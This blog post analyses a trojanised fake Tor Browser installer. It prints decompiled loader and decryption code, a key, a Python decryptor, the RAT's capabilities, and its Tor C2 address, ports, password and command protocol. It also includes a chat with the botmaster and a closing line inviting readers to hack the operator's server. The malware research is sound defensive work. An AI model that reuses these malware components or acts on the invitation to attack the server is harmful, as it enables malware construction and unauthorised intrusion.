Artificial truth

archives | latest | homepage

The more you see, the less you believe.

Torbundlebrowser.org
Wed 13 August 2014 — download

A couple of hours ago, a friend of mine told me:

< nextgens> jvoisin> if you want some malware to look into: torbundlebrowser.org

The website is an almost perfect copy of the original website, except for the download link, and also the donation one, replaced by a bitcoin address.

Fake one

fake

Original one

original

First binary

I downloaded the alleged Tor Browser Bundle (password: infected), named "torbrowser-install-3.6.3_en-US.exe", and PEiD/yara told me that it's a .NET executable. ILSpy shows us:

// Entry point: eval_b.a
// Architecture: x86
// Runtime: .NET 2.0

using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyVersion("3.6.3.0")]
[assembly: Dotfuscator("retail:1:1:4.9.5000.15987", 1, true)]
[assembly: AssemblyCompany("Tor Project")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCopyright("Copyright ©  2014")]
[assembly: AssemblyDescription("Tor Browser")]
[assembly: AssemblyFileVersion("3.6.3.0")]
[assembly: AssemblyProduct("Tor Browser 3.6.3")]
[assembly: AssemblyTitle("Tor Browser Obfuscated with Dotfuscator Professional Evaluation. Illegal to use on software for general release.")]
[assembly: AssemblyTrademark("")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: ComVisible(false)]
[assembly: Guid("00000000-0000-0000-0000-000000000000")]

Just drop the binary on the latest version of de4dot to get an unpacked version.

There is an interesting resource named "TorProject.vid.mkv", which seems to be some data with high entropy: likely a packed/crypted payload.

The sample has a few methods; here is the (only) interesting one:

// eval_a
public static void eval_a(string string_0, string string_1, string string_2) {
    try {
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) {
            byte[] bytes = Encoding.UTF8.GetBytes(string_2);
            byte[] bytes2 = Encoding.UTF8.GetBytes(string_2);
            using (FileStream fileStream = new FileStream(string_0, FileMode.Open)) {
                using (FileStream fileStream2 = new FileStream(string_1, FileMode.Create)) {
                    using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(bytes, bytes2)) {
                        using (CryptoStream cryptoStream = new CryptoStream(fileStream, cryptoTransform, CryptoStreamMode.Read)) {
                            int num;
                            while ((num = cryptoStream.ReadByte()) != -1)
                                fileStream2.WriteByte((byte)num);
                        }
                    }
                }
            }
        }
    }
    catch (Exception) {}
}

It's called with the following parameters:

  1. vid.mkv
  2. Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\Windows\" + "\windll32.exe"
  3. VisualStudio2010

So, to sum up, the next payload is encrypted with Rijndael, must be decrypted with the key "VisualStudio2010", and the result will be written to %AppData%\Windows\windll32.exe

Since I'm super lazy, I used a build of ILSpy with an integrated debugger, set a breakpoint after the decryption, and got the second binary.

Second binary

I was quite amused by the some method names, since the binary may look like a game at first sight:

public static void CastNetToWinGame(string filename) // Make a screenshot
public static string MakeSenseofItAll(string Message, string Passphrase) // Decryption routine
public static string TallyUpScoresNewGame() // Network-interface-related crap
public static string NiceShot() // Check the serial number of Win32_Physicalmedia
public static string HighScores(string Message, string Passphrase) // Decryption routine
public static string E3nCodeIt(string filename) // Base64 encoding of files
public static void StartANewGame(string ProcessFilename, string args) // Start a new process
public static void ClearScores(string filename) // Delete a file
public static bool VirtualReality() // Check if the malware is in a virtual machine (VMWare/VirtualBox/VirtualPC)
public static void RegisterYourGame(string path) // Add a key in the register for autostart/persistence
public static void MakeitNew(string upgfile) // Download, Update/replace, run a new binary
public static string Levelup() // Get information about hard drive
public void StartGame() // Setup the communication canal to the CC
public void RoundTwo() // Communication protocol with the CC
private void RecurringScores(string dirPath, string uploadPath) // Upload files recursively
private void ShotThroughTheHeart() // Try to take and upload a screenshot
private void FinalBossinGame(string filename) // Execute a custom command
private static void RollCredits() // Deploy the embeded Tor binary
...

Some commands are run by the mean of "cmd.exe", and are prefixed with ping localhost -n 10 &, likely to ensure that those commands are not run inside a sandbox like cuckoo.

Decryption

All around the code, there are call to so functions, with a base64 encoded string as first argument, and "video game hall of fame" as second. Here is the corresponding decryption function:

public static string MakeSenseofItAll(string Message, string Passphrase) {
            UTF8Encoding uTF8Encoding = new UTF8Encoding();
            MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
            byte[] key = mD5CryptoServiceProvider.ComputeHash(uTF8Encoding.GetBytes(Passphrase));
            TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
            tripleDESCryptoServiceProvider.Key = key;
            tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;
            tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
            byte[] array = Convert.FromBase64String(Message);
            byte[] bytes;
            try {
                ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
                bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
            }
            finally {
                tripleDESCryptoServiceProvider.Clear();
                mD5CryptoServiceProvider.Clear();
            }
            return uTF8Encoding.GetString(bytes);
        }

I wrote a quick'n'dirty decryptor in Python:

from Crypto.Cipher import DES3
import hashlib
from base64 import b64decode

key = hashlib.md5("video game hall of fame").digest()
cipher = DES3.new(key, DES3.MODE_ECB)

ciphertexts = [
"M8aFUlePIs6oxgq7J5o/cw==",
'/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7',
'dsk6h/rjpLX3iTcm90vaMQ==',
'/vAilHtgVYHl7LzMwlpm2Q==',
'A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31',
'oJTGIrUW7JfeVS7umpFv9Q==',
'EgMhlrqaGkH3iTcm90vaMQ==',
'dsk6h/rjpLX3iTcm90vaMQ==',
'M635gItlrs+0hltKwH36eippmvgBHvW1',
'QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU='
]

for i in ciphertexts:
    print "%s : %s" % (i, cipher.decrypt(b64decode(i)))

This is the result:

M8aFUlePIs6oxgq7J5o/cw== : 127.0.0.1
/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7 : silkroad6cebts64.onion
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
/vAilHtgVYHl7LzMwlpm2Q== :  downloaded OK
A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31 : Error downloading file
EgMhlrqaGkH3iTcm90vaMQ== : CONNECT|
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
M635gItlrs+0hltKwH36eippmvgBHvW1 :  Screenshot Captured:
oJTGIrUW7JfeVS7umpFv9Q== : \videodrv.exe
QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU= :  Error getting screenshot

Communication with the CC

The communication protocol is quite simple, the only interesting thing is that it runs on Tor, on the hidden service silkroad6cebts64.onion:24576

This is the syntax to say to connect to the CC, and wait for commands:

CONNECT|v1.17117|117|

Where v1.17 is the version number, and 117| is likely a release type identifier, since I found a "slim113" chain in another sample.

Commands can be:

  • Netcat, to launch another connection
  • putfile, to download a file
  • upgrade, to upgrade the malware
  • shot, to get a screenshot
  • updir, to upload a directory recursively
  • syscommand, to execute a system command
  • GetDrives, to get drives (duh.)
  • reboot, to reboot (duh again)
  • restart, to restart the malware
  • get, to dowload a file
  • getfile, to upload a file

There is also another port used, 24577, with "Snake Video Game" as password, likely used for file transferts. I even had a chitchat with the botmaster:

amnesia@amnesia:~$ nc silkroad6cebts64.onion 24577
Snake Video Game
.
dir
.
Hello :)  
hi
Nice job with this malware
may i ask who this is
I stumbled upon your website, and was curious
oh nice. gj dissassembling. what did u use ?
ILSpy
I was curious about your payload
cool. great work. reflector could have worked too :D
Sure, but I prefer free sare you a malware researcher?
I didn't get your question
[REDACTED]
oh, 
payload needs work as u can tell
I'll be happy to take a look at it
Ho, by the way, I'm also curioushow did you find the site btw?
A friend of mine gave me the link          
heh nice, what are you using now, putty?
netcat
ah
Cdo you write mal?
You want me to send you an email?
sure [REDACTED]@safe-mail.net
I'm curious about how many bots do you have
[...]

S·he told me that they are a small group (maybe from China) trying to catch pedophiles; by spreading the link to the fake website on pedo-boards, adding that one pedophile was already reported to cybertip. I'm not convinced, since the miscreant not only shipped a malware instead of the real TBB, but also replaced the donation page with his own BTC address.

Their server is a stack of outdated crap, proudly powered by cPanel, feel free to pwn them for more details.